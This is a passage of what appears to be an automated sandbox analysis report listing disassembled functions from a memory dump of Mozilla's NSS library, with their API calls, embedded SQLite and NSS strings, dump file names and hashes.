                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0600: PR_SetError.NSS3(FFFFE8A9,00000000,?,?,?,?,?,6C6E05E2), ref: 6C6E06E6
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C72C0F2
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C72C10E
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C72C081
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9440: TlsGetValue.KERNEL32 ref: 6C7B945B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9440: TlsGetValue.KERNEL32 ref: 6C7B9479
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9440: EnterCriticalSection.KERNEL32 ref: 6C7B9495
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9440: TlsGetValue.KERNEL32 ref: 6C7B94E4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9440: TlsGetValue.KERNEL32 ref: 6C7B9532
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9440: LeaveCriticalSection.KERNEL32 ref: 6C7B955D
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C72C068
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90AB
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B90C9
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: EnterCriticalSection.KERNEL32 ref: 6C7B90E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: TlsGetValue.KERNEL32 ref: 6C7B9116
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9090: LeaveCriticalSection.KERNEL32 ref: 6C7B913F
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6E0600: GetProcAddress.KERNEL32(?,?), ref: 6C6E0623
                                                                                                                                                                                                                                                                                          • _NSSUTIL_UTF8ToWide.NSS3(?), ref: 6C72C14F
                                                                                                                                                                                                                                                                                          • PR_LoadLibraryWithFlags.NSS3 ref: 6C72C183
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C72C18E
                                                                                                                                                                                                                                                                                          • PR_LoadLibrary.NSS3(?), ref: 6C72C1A3
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C72C1D4
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C72C1F3
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852318,6C72CA70), ref: 6C72C210
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C72C22B
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C72C247
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C72C26A
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C72C287
                                                                                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(?), ref: 6C72C2D0
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEBUG_PKCS11_MODULE), ref: 6C72C392
                                                                                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C72C3AB
                                                                                                                                                                                                                                                                                          • PR_NewLogModule.NSS3(nss_mod_log), ref: 6C72C3D1
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_FORCE_TOKEN_LOCK), ref: 6C72C782
                                                                                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DISABLE_UNLOAD), ref: 6C72C7B5
                                                                                                                                                                                                                                                                                          • PR_UnloadLibrary.NSS3(?), ref: 6C72C7CC
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE097,00000000), ref: 6C72C82E
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C72C8BF
                                                                                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C72C8D5
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C72C900
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C72C9C7
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C72C9E5
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C72CA5A
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Monitor$Value$Enter$CriticalExitSection$Error$LeaveLibrary$Alloc_SecureUtilfree$ArenaLastLoadUnloadstrcmp$AddressCallFlagsModuleOnceProcR_snprintfTextWideWithmemcpystrlen
                                                                                                                                                                                                                                                                                          • String ID: FC_GetFunctionList$FC_GetInterface$NSC_GetFunctionList$NSC_GetInterface$NSC_ModuleDBFunc$NSS_DEBUG_PKCS11_MODULE$NSS_DISABLE_UNLOAD$NSS_FORCE_TOKEN_LOCK$NSS_ReturnModuleSpecData$PKCS 11$Vendor NSS FIPS Interface$nss_mod_log
                                                                                                                                                                                                                                                                                          • API String ID: 4243957313-3613044529
                                                                                                                                                                                                                                                                                          • Opcode ID: 8f586b4383138db1143d79076421e658fee925c3fe26aa561c8d9913dcfb8581
                                                                                                                                                                                                                                                                                          • Instruction ID: 00c059be96687878afed41514070f66acfd48f4cf6b56743b18a5e5fdf80a706
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f586b4383138db1143d79076421e658fee925c3fe26aa561c8d9913dcfb8581
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2429FB5A002048FEF60DF64CA4AB5A7BB1FB66309F844039D8059BB21EB7DD954CBD1
                                                                                                                                                                                                                                                                                          Function 6C803FC0 Relevance: 70.5, APIs: 37, Strings: 3, Instructions: 485stringprocessCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000008), ref: 6C803FD5
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C803FFE
                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(-00000003), ref: 6C804016
                                                                                                                                                                                                                                                                                          • strpbrk.API-MS-WIN-CRT-STRING-L1-1-0(?,6C83FC62), ref: 6C80404A
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C80407E
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C8040A4
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,0000005C,00000000), ref: 6C8040D7
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C804112
                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000000), ref: 6C80411E
                                                                                                                                                                                                                                                                                          • __p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 6C80414D
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C804160
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C80416C
                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(?), ref: 6C8041AB
                                                                                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,NSPR_INHERIT_FDS=,00000011), ref: 6C8041EF
                                                                                                                                                                                                                                                                                          • qsort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,00000004,6C804520), ref: 6C804244
                                                                                                                                                                                                                                                                                          • GetEnvironmentStrings.KERNEL32 ref: 6C80424D
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C804263
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C804283
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C8042B7
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C8042E4
                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000002), ref: 6C8042FA
                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsA.KERNEL32(?), ref: 6C804342
                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 6C8043AB
                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 6C8043B2
                                                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4), ref: 6C8043B9
                                                                                                                                                                                                                                                                                          • FreeEnvironmentStringsA.KERNEL32(?), ref: 6C804403
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE890,00000000), ref: 6C804410
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6C80445E
                                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 6C80446B
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C804482
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C804492
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C8044A4
                                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C8044B2
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE896,00000000), ref: 6C8044BE
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C8044C7
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C8044D5
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C8044EA
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$Errormallocstrlen$Handle$EnvironmentStringsmemset$Free$CloseCreateLastProcessValue__p__environqsortstrncmpstrpbrk
                                                                                                                                                                                                                                                                                          • String ID: =$D$NSPR_INHERIT_FDS=
                                                                                                                                                                                                                                                                                          • API String ID: 3116300875-3553733109
                                                                                                                                                                                                                                                                                          • Opcode ID: 31e6bee15a82070c54335a68c33c1559d63c9ac015728c786cc0f34c245da723
                                                                                                                                                                                                                                                                                          • Instruction ID: 307d9cc9663f2c990608d15421d63ffe2b3e7756dd6b21f82b02dd8a553a045d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31e6bee15a82070c54335a68c33c1559d63c9ac015728c786cc0f34c245da723
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8502E470F452159BEB30DF698E4479EBBB8AFE630CF24492CD859A7742D731A804CB91
                                                                                                                                                                                                                                                                                          Function 6C716D90 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 809COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C81A8EC,0000006C), ref: 6C716DC6
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C81A958,0000006C), ref: 6C716DDB
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C81A9C4,00000078), ref: 6C716DF1
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C81AA3C,0000006C), ref: 6C716E06
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,6C81AAA8,00000060), ref: 6C716E1C
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C716E38
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C716E76
                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C71726F
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C717283
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memcpy$Value$CriticalDoesEnterErrorK11_MechanismSection
                                                                                                                                                                                                                                                                                          • String ID: !
                                                                                                                                                                                                                                                                                          • API String ID: 3333340300-2657877971
                                                                                                                                                                                                                                                                                          • Opcode ID: 23e43c0692cefba6352ac2135d9d8ec047dfa8de551ea5aa5867b6e46664f6e2
                                                                                                                                                                                                                                                                                          • Instruction ID: 651d6dc2b3cfaed50b6699f75931f11d4d41acc2e49bb7af48f676f716db78df
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 23e43c0692cefba6352ac2135d9d8ec047dfa8de551ea5aa5867b6e46664f6e2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E728DB5D092199FDF60DF28CD8879ABBB5EF49308F1441A9D80DA7701EB319A84CF91
                                                                                                                                                                                                                                                                                          Function 6C683C40 Relevance: 41.2, APIs: 20, Strings: 3, Instructions: 932COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C683C66
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(000000FD,?), ref: 6C683D04
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C683EAD
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C683ED7
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C683F74
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C684052
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C68406F
                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001), ref: 6C68410D
                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011A47,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C68449C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulong$sqlite3_log
                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                          • API String ID: 2597148001-598938438
                                                                                                                                                                                                                                                                                          • Opcode ID: 845e9e080eedc6f1c50468b6a7124069e85a71d4b2da724bfb7e97831eee182b
                                                                                                                                                                                                                                                                                          • Instruction ID: a4a527e24859fda7dc0502b2470b6ebe9a0c496fc82cabfa72873ecb084a66ef
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 845e9e080eedc6f1c50468b6a7124069e85a71d4b2da724bfb7e97831eee182b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB82C070A02204CFCB14CF68C590BAEB7B6FF49318F258569D905ABB51E771EC42CBA5
                                                                                                                                                                                                                                                                                          Function 6C75AC30 Relevance: 39.5, APIs: 26, Instructions: 539memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(?), ref: 6C75ACC4
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,000040F4), ref: 6C75ACD5
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,000040F4), ref: 6C75ACF3
                                                                                                                                                                                                                                                                                          • SEC_ASN1EncodeInteger_Util.NSS3(?,00000018,00000003), ref: 6C75AD3B
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,00000000), ref: 6C75ADC8
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C75ADDF
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C75ADF0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C75B06A
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C75B08C
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C75B1BA
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C75B27C
                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(?,00000000,00002010), ref: 6C75B2CA
                                                                                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C75B3C1
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C75B40C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Error$Arena_Free$ArenaItem_memset$Alloc_CopyEncodeInteger_Mark_ValueZfree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1285963562-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1a2384dcd640813ae792078e9df68a0fc581b3aab1a01f0e3d9800e20e684164
                                                                                                                                                                                                                                                                                          • Instruction ID: 9531e1bb10808199f54889b161f83728accfdd36fcdcb453ec01d88de6df187f
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a2384dcd640813ae792078e9df68a0fc581b3aab1a01f0e3d9800e20e684164
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D322B271904300AFE710CF14CE49BAA77E1AF8431CF54857CE8595B792EB72E869CB92
                                                                                                                                                                                                                                                                                          Function 6C6A1F90 Relevance: 35.9, APIs: 5, Strings: 18, Instructions: 1430COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6A25F3
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          • '%s' is not a function, xrefs: 6C6A2FD2
                                                                                                                                                                                                                                                                                          • unsafe use of virtual table "%s", xrefs: 6C6A30D1
                                                                                                                                                                                                                                                                                          • cannot join using column %s - column not present in both tables, xrefs: 6C6A32AB
                                                                                                                                                                                                                                                                                          • a NATURAL join may not have an ON or USING clause, xrefs: 6C6A32C1
                                                                                                                                                                                                                                                                                          • recursive reference in a subquery: %s, xrefs: 6C6A22E5
                                                                                                                                                                                                                                                                                          • too many references to "%s": max 65535, xrefs: 6C6A2FB6
                                                                                                                                                                                                                                                                                          • no such index: "%s", xrefs: 6C6A319D
                                                                                                                                                                                                                                                                                          • %s.%s.%s, xrefs: 6C6A302D
                                                                                                                                                                                                                                                                                          • multiple recursive references: %s, xrefs: 6C6A22E0
                                                                                                                                                                                                                                                                                          • H, xrefs: 6C6A329F
                                                                                                                                                                                                                                                                                          • too many columns in result set, xrefs: 6C6A3012
                                                                                                                                                                                                                                                                                          • H, xrefs: 6C6A322D
                                                                                                                                                                                                                                                                                          • %s.%s, xrefs: 6C6A2D68
                                                                                                                                                                                                                                                                                          • access to view "%s" prohibited, xrefs: 6C6A2F4A
                                                                                                                                                                                                                                                                                          • cannot have both ON and USING clauses in the same join, xrefs: 6C6A32B5
                                                                                                                                                                                                                                                                                          • no such table: %s, xrefs: 6C6A26AC
                                                                                                                                                                                                                                                                                          • table %s has %d values for %d columns, xrefs: 6C6A316C
                                                                                                                                                                                                                                                                                          • no tables specified, xrefs: 6C6A26BE
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                                                                          • String ID: %s.%s$%s.%s.%s$'%s' is not a function$H$H$a NATURAL join may not have an ON or USING clause$access to view "%s" prohibited$cannot have both ON and USING clauses in the same join$cannot join using column %s - column not present in both tables$multiple recursive references: %s$no such index: "%s"$no such table: %s$no tables specified$recursive reference in a subquery: %s$table %s has %d values for %d columns$too many columns in result set$too many references to "%s": max 65535$unsafe use of virtual table "%s"
                                                                                                                                                                                                                                                                                          • API String ID: 3510742995-3400015513
                                                                                                                                                                                                                                                                                          • Opcode ID: f9bd97339f6c88380ee07fe789bce319754d53496065bc927ab55acfde8b2748
                                                                                                                                                                                                                                                                                          • Instruction ID: 7582612c5aae817f1da05b08ed6be27a6291cc4f2ea60e7fd0c1e2b49c2c7b18
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9bd97339f6c88380ee07fe789bce319754d53496065bc927ab55acfde8b2748
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1FD25B74E442098FDB04CF96C498B9DB7B2BF49308F2481A9D859AB752D731EC47CB98
                                                                                                                                                                                                                                                                                          Function 6C6DECD0 Relevance: 33.8, APIs: 7, Strings: 12, Instructions: 539COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • sqlite3_initialize.NSS3 ref: 6C6DED38
